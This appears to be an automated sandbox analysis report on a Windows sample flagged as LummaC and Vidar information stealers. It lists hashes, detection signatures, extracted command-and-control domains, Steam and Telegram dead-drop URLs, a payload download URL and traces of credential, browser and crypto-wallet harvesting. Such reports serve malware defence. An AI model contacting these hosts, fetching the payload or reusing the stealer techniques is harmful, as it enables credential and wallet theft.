Windows Analysis Report
VmRHSCaiyc.exe

Overview

General Information

Sample name:	VmRHSCaiyc.exe renamed because original name is a hash value
Original sample name:	1ea9e6542ab9990ae4a578c799e185ae.exe
Analysis ID:	1528609
MD5:	1ea9e6542ab9990ae4a578c799e185ae
SHA1:	fbf88d5a63b8681e6ad99ed2352d7cb5c3b5af9d
SHA256:	3e9bcffa53eaeed8668e7908a9a85b3c2a67608f7c3a1ceba896a8a1f45add76
Tags:	32exe
Infos:

Detection

LummaC, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Country aware sample found (crashes after keyboard check)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: VmRHSCaiyc.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/badges	URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\HCFIIIJJKJ.exe	Avira: detection malicious, Label: HEUR/AGEN.1310458
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\a43486128347[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1310458

Found malware configuration

Source: 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199786602107", "https://t.me/maslengdsa"], "Botnet": "4a5bc8b73e12425adc3c399da8136891"}
Source: 16.2.MSBuild.exe.400000.0.raw.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["laddyirekyi.sbs", "frizzettei.sbs", "bemuzzeki.sbs", "exemplarou.sbs", "invinjurhey.sbs", "isoplethui.sbs", "exilepolsiy.sbs", "wickedneatr.sbs"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for domain / URL

Source: cowod.hopto.org	Virustotal: Detection: 10%	Perma Link
Source: nsdm.cumpar-auto-orice-tip.ro	Virustotal: Detection: 8%	Perma Link
Source: sergei-esenin.com	Virustotal: Detection: 11%	Perma Link
Source: exemplarou.sbs	Virustotal: Detection: 6%	Perma Link
Source: http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe	Virustotal: Detection: 17%	Perma Link
Source: http://cowod.hopto.org	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for submitted file

Source: VmRHSCaiyc.exe	ReversingLabs: Detection: 50%
Source: VmRHSCaiyc.exe	Virustotal: Detection: 47%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\HCFIIIJJKJ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\a43486128347[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: VmRHSCaiyc.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: wickedneatr.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: invinjurhey.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: laddyirekyi.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: exilepolsiy.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: bemuzzeki.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: exemplarou.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: isoplethui.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: frizzettei.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: exemplarou.sbs
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000010.00000002.1786194225.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: H8NgCl--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	5_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	5_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00411E32 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	5_2_00411E32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040A7AD _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	5_2_0040A7AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2CA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	5_2_6D2CA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D3125B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	5_2_6D3125B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D294420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	5_2_6D294420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C4440 PK11_PrivDecrypt,	5_2_6D2C4440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C44C0 PK11_PubEncrypt,	5_2_6D2C44C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	5_2_6D2EA730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A8670 PK11_ExportEncryptedPrivKeyInfo,	5_2_6D2A8670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2CA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	5_2_6D2CA650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2AE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	5_2_6D2AE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2F0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	5_2_6D2F0180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C43B0 PK11_PubEncryptPKCS1,PR_SetError,	5_2_6D2C43B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	5_2_6D2EBD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2A7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	5_2_6D2A7D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	5_2_6D2E7C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C3FF0 PK11_PrivDecryptPKCS1,	5_2_6D2C3FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2E9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	5_2_6D2E9EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	5_2_6D2C9840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2C3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	5_2_6D2C3850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_6D2EDA40 SEC_PKCS7ContentIsEncrypted,	5_2_6D2EDA40

Uses 32bit PE files

Source: VmRHSCaiyc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.7:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.7:49987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.7:49990 version: TLS 1.2

Source: VmRHSCaiyc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000005.00000002.1817684509.000000006D63D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.5.dr, freebl3[1].dll.5.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.5.dr, freebl3[1].dll.5.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000005.00000002.1800280648.00000000381EE000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.5.dr, vcruntime140.dll.5.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000005.00000002.1794363422.000000002C30A000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.5.dr, msvcp140[1].dll.5.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000005.00000002.1817017421.000000006D39F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000005.00000002.1817684509.000000006D63D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000005.00000002.1778653897.000000001A032000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788346120.000000001FFA8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.5.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.dr, softokn3[1].dll.5.dr

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4_2_00369ABF FindFirstFileExW,	4_2_00369ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00416013 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_00416013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	5_2_0041547D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_00409CF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	5_2_00414D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_0040D59B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	5_2_0040B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	5_2_0040BF22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_0040B914
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	5_2_00415B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	5_2_0040CD0C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002E9ABF FindFirstFileExW,	15_2_002E9ABF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

5_2_00415182

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	4_2_0037E385
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	4_2_0037E385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	5_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	5_2_004014AD
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx ebx, word ptr [ecx]	15_2_00328051
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	15_2_0032A0B9
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	15_2_003182E8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	15_2_0033E318
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [eax], cx	15_2_0031A3BF
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh	15_2_003443F8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	15_2_00338528
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	15_2_003445E8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00342601
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [eax], cx	15_2_0032665F
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, ebx	15_2_0031264D
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	15_2_0032A687
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	15_2_003407F8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov byte ptr [edi], al	15_2_00330813
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	15_2_0031A86A
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp dword ptr [0044FDB4h]	15_2_00312849
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	15_2_003468A8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h	15_2_0031C89C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	15_2_0033093D
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	15_2_00302928
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp eax	15_2_0030E914
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp eax	15_2_0030E9A5
